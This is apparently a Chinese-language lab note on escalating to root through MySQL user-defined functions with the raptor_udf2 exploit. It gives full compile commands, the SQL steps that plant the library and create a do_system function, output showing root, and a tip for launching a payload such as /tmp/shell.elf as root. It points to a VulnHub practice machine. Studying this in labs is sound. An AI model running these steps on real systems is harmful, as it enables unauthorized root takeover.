实验环境:
Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (x86_64) using readline 6.3
可用POC:
https://0xdeadbeef.info/exploits/raptor_udf2.c
https://www.exploit-db.com/exploits/1518/
提权步骤:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
(此处有坑,exploit-db中将 -Wl 写成-W1 导致编译失败,若在目标机器上编译失败时可在本机编译后上传)
* $ mysql -u root -p
* Enter password:
* [...]
* mysql# use mysql;
* mysql# create table foo(line blob);
* mysql# insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
* mysql# select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
(此处需要注意:动态库的放置位置为目标机器mysql插件路径,可用以下命令获取:show variables like "%plugin%";)
* mysql# create function do_system returns integer soname 'raptor_udf2.so';
* mysql# select * from mysql.func;
* +-----------+-----+----------------+----------+
* | name | ret | dl | type |
* +-----------+-----+----------------+----------+
* | do_system | 2 | raptor_udf2.so | function |
* +-----------+-----+----------------+----------+
* mysql# select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
(进行到此已可用root身份执行命令,替换id即可如:select do_system('/tmp/shell.elf'); 这将已root身份启动一个应用程序)
(chown raptor.raptor 应按实际用户身份更改)
* mysql# \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*/
参考文档:
http://www.91ri.org/16540.html
https://www.jianshu.com/p/5b34c1b6dee7
https://www.youtube.com/watch?v=G52yT0Gv_zc
http://www.hackingarticles.in/hack-the-raven-walkthrough-ctf-challenge/
练习题:
https://www.vulnhub.com/entry/raven-1,256/